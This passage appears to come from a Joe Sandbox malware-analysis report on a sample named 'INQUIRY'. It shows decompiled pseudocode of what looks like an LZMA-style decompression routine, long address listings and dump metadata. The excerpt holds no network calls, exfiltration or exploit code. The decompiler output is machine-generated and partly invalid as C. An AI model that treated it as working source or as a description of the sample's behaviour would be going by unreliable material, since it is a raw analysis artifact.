                          												__edx = 0;
                          												_t274 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t274;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												_t283 = __ebp - 0x64;
                          												 *_t283 =  *(__ebp - 0x64) - 1;
                          												__eflags =  *_t283;
                          												 *( *(__ebp - 0x68)) = __cl;
                          												L79:
                          												 *(__ebp - 0x14) = __edx;
                          												goto L80;
                          											case 0x1c:
                          												while(1) {
                          													L123:
                          													__eflags =  *(__ebp - 0x64);
                          													if( *(__ebp - 0x64) == 0) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__edx =  *(__ebp - 8);
                          													__cl =  *(__eax + __edx);
                          													__eax =  *(__ebp - 0x14);
                          													 *(__ebp - 0x5c) = __cl;
                          													 *(__eax + __edx) = __cl;
                          													__eax = __eax + 1;
                          													__edx = 0;
                          													_t414 = __eax %  *(__ebp - 0x74);
                          													__eax = __eax /  *(__ebp - 0x74);
                          													__edx = _t414;
                          													__eax =  *(__ebp - 0x68);
                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          													__eflags =  *(__ebp - 0x30);
                          													 *( *(__ebp - 0x68)) = __cl;
                          													 *(__ebp - 0x14) = _t414;
                          													if( *(__ebp - 0x30) > 0) {
                          														continue;
                          													} else {
                          														L80:
                          														 *(__ebp - 0x88) = 2;
                          														goto L1;
                          													}
                          												}
                          												 *(__ebp - 0x88) = 0x1c;
                          												goto L170;
                          										}
                          									}
                          									L171:
                          									_t544 = _t543 | 0xffffffff;
                          									goto L172;
                          								}
                          							}
                          						}
                          					}
                          					goto L1;
                          				}
                          			}














                          0x00000000
                          0x004062eb
                          0x004062eb
                          0x004062ef
                          0x00406310
                          0x00406317
                          0x0040631d
                          0x00406323
                          0x00406335
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x004062f1
                          0x004062f7
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8
                          0x00000000
                          0x004062ef

                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                          • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                          • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                          • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406409() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						 *(_t613 - 0x84) = 0xb;
                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                          						goto L132;
                          					} else {
                          						__eax =  *(__ebp - 0x28);
                          						L88:
                          						 *(__ebp - 0x2c) = __eax;
                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          						L89:
                          						__eax =  *(__ebp - 4);
                          						 *(__ebp - 0x80) = 0x15;
                          						__eax =  *(__ebp - 4) + 0xa68;
                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          						L69:
                          						 *(__ebp - 0x84) = 0x12;
                          						while(1) {
                          							L132:
                          							 *(_t613 - 0x54) = _t606;
                          							while(1) {
                          								L133:
                          								_t531 =  *_t606;
                          								_t589 = _t531 & 0x0000ffff;
                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          								if( *(_t613 - 0xc) >= _t565) {
                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          									 *(_t613 - 0x40) = 1;
                          									_t532 = _t531 - (_t531 >> 5);
                          									 *_t606 = _t532;
                          								} else {
                          									 *(_t613 - 0x10) = _t565;
                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          								}
                          								if( *(_t613 - 0x10) >= 0x1000000) {
                          									goto L139;
                          								}
                          								L137:
                          								if( *(_t613 - 0x6c) == 0) {
                          									 *(_t613 - 0x88) = 5;
                          									L170:
                          									_t568 = 0x22;
                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          									_t535 = 0;
                          									L172:
                          									return _t535;
                          								}
                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          								L139:
                          								_t533 =  *(_t613 - 0x84);
                          								while(1) {
                          									 *(_t613 - 0x88) = _t533;
                          									while(1) {
                          										L1:
                          										_t534 =  *(_t613 - 0x88);
                          										if(_t534 > 0x1c) {
                          											break;
                          										}
                          										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          											case 0:
                          												if( *(_t613 - 0x6c) == 0) {
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          												_t534 =  *( *(_t613 - 0x70));
                          												if(_t534 > 0xe1) {
                          													goto L171;
                          												}
                          												_t538 = _t534 & 0x000000ff;
                          												_push(0x2d);
                          												asm("cdq");
                          												_pop(_t570);
                          												_push(9);
                          												_pop(_t571);
                          												_t609 = _t538 / _t570;
                          												_t540 = _t538 % _t570 & 0x000000ff;
                          												asm("cdq");
                          												_t604 = _t540 % _t571 & 0x000000ff;
                          												 *(_t613 - 0x3c) = _t604;
                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          													L10:
                          													if(_t612 == 0) {
                          														L12:
                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          														goto L15;
                          													} else {
                          														goto L11;
                          													}
                          													do {
                          														L11:
                          														_t612 = _t612 - 1;
                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          													} while (_t612 != 0);
                          													goto L12;
                          												}
                          												if( *(_t613 - 4) != 0) {
                          													GlobalFree( *(_t613 - 4));
                          												}
                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                          												 *(_t613 - 4) = _t534;
                          												if(_t534 == 0) {
                          													goto L171;
                          												} else {
                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          													goto L10;
                          												}
                          											case 1:
                          												L13:
                          												__eflags =  *(_t613 - 0x6c);
                          												if( *(_t613 - 0x6c) == 0) {
                          													 *(_t613 - 0x88) = 1;
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          												_t45 = _t613 - 0x48;
                          												 *_t45 =  *(_t613 - 0x48) + 1;
                          												__eflags =  *_t45;
                          												L15:
                          												if( *(_t613 - 0x48) < 4) {
                          													goto L13;
                          												}
                          												_t546 =  *(_t613 - 0x40);
                          												if(_t546 ==  *(_t613 - 0x74)) {
                          													L20:
                          													 *(_t613 - 0x48) = 5;
                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          													goto L23;
                          												}
                          												 *(_t613 - 0x74) = _t546;
                          												if( *(_t613 - 8) != 0) {
                          													GlobalFree( *(_t613 - 8));
                          												}
                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          												 *(_t613 - 8) = _t534;
                          												if(_t534 == 0) {
                          													goto L171;
                          												} else {
                          													goto L20;
                          												}
                          											case 2:
                          												L24:
                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          												 *(_t613 - 0x84) = 6;
                          												 *(_t613 - 0x4c) = _t553;
                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                          												L132:
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											case 3:
                          												L21:
                          												__eflags =  *(_t613 - 0x6c);
                          												if( *(_t613 - 0x6c) == 0) {
                          													 *(_t613 - 0x88) = 3;
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												_t67 = _t613 - 0x70;
                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          												__eflags =  *_t67;
                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          												L23:
                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          												if( *(_t613 - 0x48) != 0) {
                          													goto L21;
                          												}
                          												goto L24;
                          											case 4:
                          												L133:
                          												_t531 =  *_t606;
                          												_t589 = _t531 & 0x0000ffff;
                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          												if( *(_t613 - 0xc) >= _t565) {
                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          													 *(_t613 - 0x40) = 1;
                          													_t532 = _t531 - (_t531 >> 5);
                          													 *_t606 = _t532;
                          												} else {
                          													 *(_t613 - 0x10) = _t565;
                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          												}
                          												if( *(_t613 - 0x10) >= 0x1000000) {
                          													goto L139;
                          												}
                          											case 5:
                          												goto L137;
                          											case 6:
                          												__edx = 0;
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x34) = 1;
                          													 *(__ebp - 0x84) = 7;
                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          													while(1) {
                          														L132:
                          														 *(_t613 - 0x54) = _t606;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          												__esi =  *(__ebp - 0x60);
                          												__cl = 8;
                          												__cl = 8 -  *(__ebp - 0x3c);
                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          												__ecx =  *(__ebp - 0x3c);
                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          												__ecx =  *(__ebp - 4);
                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          												__eflags =  *(__ebp - 0x38) - 4;
                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
